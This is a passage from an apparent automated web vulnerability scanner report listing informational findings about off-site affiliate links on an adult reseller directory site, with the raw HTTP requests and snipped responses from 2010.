User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.rivcash.com/?rcid=1281" name="link_42"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.rivcash.com/?rcid=1281" name="link_42"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke" name="link_40"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.8. http://www.resellerbase.com/adult/media-chat/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.6-chats.com/ELT
http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php
http://www.camsense.com/link.html?ref=1399934
http://www.love-money.de/?id=26660
http://www.nemproduction.com/?id=26660
http://www.neondollars.com/track/harrye:wmref:neondollars/
http://www.spacash.com/?account=resellerbase&fee=flat
http://www.vod-cash.com/?id=26660
http://www.webcams.com/affiliate/?ref=reseller

Request

GET /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:31:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 54669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113" name="link_38"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.webcams.com/affiliate/?ref=reseller" name="link_39"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.9. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.10. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.11. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.12. http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.13. http://www.resellerbase.com/adult/media-chat/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/media-chat/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:30:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.14. http://www.resellerbase.com/adult/personals-dating/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.15. http://www.resellerbase.com/adult/personals-dating/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/googlepr.php?link_id=14

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/googlepr.php?link_id=14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.16. http://www.resellerbase.com/adult/personals-dating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://af.nudistfriends.com/i/af6025460
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939
http://www.datingrev.com/cgi/go.cgi?where=0815
http://www.loveme.com/go/49557
http://www.sitesinstantly.com/?bid=3617
http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425

Request

GET /adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.sitesinstantly.com/?bid=3617" name="link_26"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.sitesinstantly.com/?bid=3617" name="link_26"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.17. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.18. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.19. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

